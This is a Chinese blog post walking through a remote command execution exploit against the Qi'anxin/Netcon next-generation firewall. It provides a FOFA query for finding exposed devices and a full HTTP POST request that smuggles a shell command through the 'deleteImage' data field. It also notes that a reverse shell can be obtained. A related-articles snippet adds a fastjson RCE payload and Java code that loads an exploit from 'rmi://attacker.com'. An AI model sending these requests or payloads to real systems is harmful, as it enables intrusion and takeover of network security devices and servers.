奇安信 网康下一代防火墙 RCE复现

最新推荐文章于 2024-02-01 16:15:26 发布
置顶 最新推荐文章于 2024-02-01 16:15:26 发布
阅读量1.7k 收藏 2
点赞数 2
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43227251/article/details/115658803
版权

奇安信 网康下一代防火墙 RCE

漏洞描述

奇安信 网康下一代防火墙存在远程命令执行,通过漏洞攻击者可以获取服务器权限

漏洞影响

奇安信 网康下一代防火墙

FOFA

app=“网康科技-下一代防火墙”

漏洞复现

登录页面如下
在这里插入图片描述

发送如下请求包

POST /directdata/direct/router HTTP/1.1
Host: 
Connection: close
Content-Length: 179
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Content-Type: application/json
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami >/var/www/html/cmd.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

再请求获取命令执行结果

http://x.x.x.x/cmd.txt

在这里插入图片描述
反弹shell

在这里插入图片描述

qin9.
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
奇安信防火墙入侵防御特征库、应用识别库、病毒库、URL资源库、ISP信息库、区域库手动升级
weixin_59079773的博客
11-28 4539
奇安信防火墙入侵防御特征库、应用识别库、病毒库、URL资源库、ISP信息库、区域库手动升级
奇安信防火墙配置手册_网络基础 | Cisco ASA 防火墙基本配置
weixin_39565300的博客
11-25 8023
Fire Wall 防火墙,相信混IT圈的小伙伴们都知道这玩意,当然,防火墙也分软件防火墙与硬件防火墙。硬件防火墙又分为:基于PC架构与基于ASIC芯片今天来聊一聊思科的硬件防火墙 Cisco ASACisco ASA 防火墙产品线挺多:Cisco ASA5505 Cisco ASA5510 Cisco ASA5520 Cisco ASA5540 Cisco ASA5550 等等AS...
漏洞复现-网康奇安信)NGFW下一代防火墙远程命令执行
qq_17754023的博客
06-23 1165
网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。该NGFW存在远程命令执行漏洞,攻击者可通过构造特殊请求执行系统命令。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。
奇安信网神防火墙系统(NSG系列)命令参考.zip
04-08
PDF 奇安信网神防火墙系统(NSG系列)命令参考【6.1.12.72317_01】.pdf
奇安信_网神防火墙_透明桥模式部署
呦菜呦爱玩的博客
03-24 9641
客户网络中新增加一台防火墙,客户要求不改变网络原有架构,现提供2种部署方案 1. 镜像旁挂:交换机做镜像,将原本流量复制一份,引入防火墙,可以查看威胁流量,但是对威胁的限制较弱 2. 透明桥:将防火墙串入网络,运用桥接口,将出入流量捆绑为一个桥,不用修改原网络的IP 客户选择使用透明桥模式部署 ## 拓扑图 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d77601268874662a56b82f06383f4a9.png) ## 配置 ## 1. 登录web控制台
奇安信网康科技防火墙远程命令执行
最新发布
qq_36334672的博客
02-01 287
fofa:app=“网康科技-下一代防火墙奇安信网康下一代防火墙(NGFW)
CVE-2020-0796微软SMBv3协议RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负简介SMB( 全 称 是 Server Message Block) 是 一 个 协 议 名 , 它 能 被 用 于 Web
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
【Jenkins-PreAuth-RCE 漏洞详解】 Jenkins 是一款广泛应用的持续集成工具,用于自动化各种软件构建、测试和部署任务。在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码...
CVE-2020-14882​&14883:Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
奇安信网神防火墙系统(NSG系列)用户手册【6.1.10.51756_02】.pdf
08-24
本手册主要介绍 360 网神防火墙 Web 管理界面支持的各项功能及配置步骤
网康上网行为管理ICG5.5 用户手册
02-11
网康上网行为管理ICG5.5 用户手册,5.5是网康2010年初左右的新版本,提供了众多新功能
防火墙初始化配置
04-08
防火墙初始化配置
360网神防火墙系统(NSG系列)命令参考【V16.12.1】.pdf
08-24
360网神防火墙系统(NSG系列)命令参考【V16.12.1】 本文档主要适用用于负责配置和维护防火墙的安全管理员。 本手册默认用户掌握 TCP/IP 协议、IP 地址及子网掩码等基本知识。
奇安信网神防火墙系统(NSG系列)快速入门
11-16
奇安信新一代防火墙,该文档包括产品简介、设备上架,申请产品许可,首次登陆设备及软件维护等操作。作为设备的快速入门文档,可以很好的帮助用户拆箱和上架设备,并做初始化。
CVE-2020-0796:微软 SMBv3 协议RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介全称是ServerMessageBlock) 是 一 个 协 议 名 , 它 能 被 用 于 Web 连 接
防火墙命令(firewall-cmd)(iptables)
weixin_39372979的博客
09-07 3362
1、查看开放端口2、查看添加的规则3、开放连续端口访问4、开放端口5、针对某个IP开放端口6、删除开放端口7、添加单个IP为白名单8、删除白名单9、重载firewalld10、禁用ssh端口--permanent 永久生效,重启后规则不消失不执行 firewall-cmd --reload 命令配置不生效1、检查firewalld状态 systemctl status firewalld。
网康科技-下一代防火墙 rce
xxx9686的博客
09-25 416
【代码】网康科技-下一代防火墙 rce
网络安全-RCE(远程命令执行)漏洞原理、攻击与防御
热门推荐
关注网络安全、云原生安全
10-05 1万+
目录 简介 原理 攻击 防御 参考 简介 RCE(remote command/code execute,远程命令执行)漏洞,一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想
fastjson rce复现
08-09
fastjson是一款流行的Java JSON库,但因其在解析JSON中的不安全行为而存在远程代码执行(RCE)漏洞。为了复现该漏洞,我们可以按照以下步骤进行操作: 第一步是选择一个适当的fastjson版本,建议使用较早的版本,因为新的版本通常会修复漏洞。将fastjson库添加到Java项目的依赖中。 第二步是创建一个恶意JSON字符串,该字符串中包含能够触发RCE漏洞的payload。例如,可以使用如下的JSON字符串: ``` { "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://attacker.com:1099/Exploit", "autoCommit":true } ``` 在这个例子中,我们使用了`com.sun.rowset.JdbcRowSetImpl`类作为目标,其中连接地址指向攻击者控制的RMI服务器,用于向受害系统发送恶意代码。 第三步是编写Java代码,并将上一步创建的JSON字符串作为输入传递给fastjson的解析器。以下是一个简单的示例: ```java import com.alibaba.fastjson.JSON; public class FastjsonRce { public static void main(String[] args) { String maliciousJson = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://attacker.com:1099/Exploit\",\"autoCommit\":true}"; Object parsedObject = JSON.parse(maliciousJson); } } ``` 在这个示例中,我们使用`JSON.parse`方法将JSON字符串解析为一个对象。fastjson在解析时会实例化目标类,并调用其构造函数和setter方法,从而导致RCE漏洞的利用。 第四步是运行上述Java代码,并观察是否成功复现RCE漏洞。如果目标系统受到fastjson的漏洞影响,恶意代码会在解析过程中被执行,从而使攻击者可以远程控制该系统。 需要注意的是,复现fastjson RCE漏洞仅用于研究和教育目的,并且应在法律合规和授权的情况下进行。漏洞利用是非法行为,可能导致严重的法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值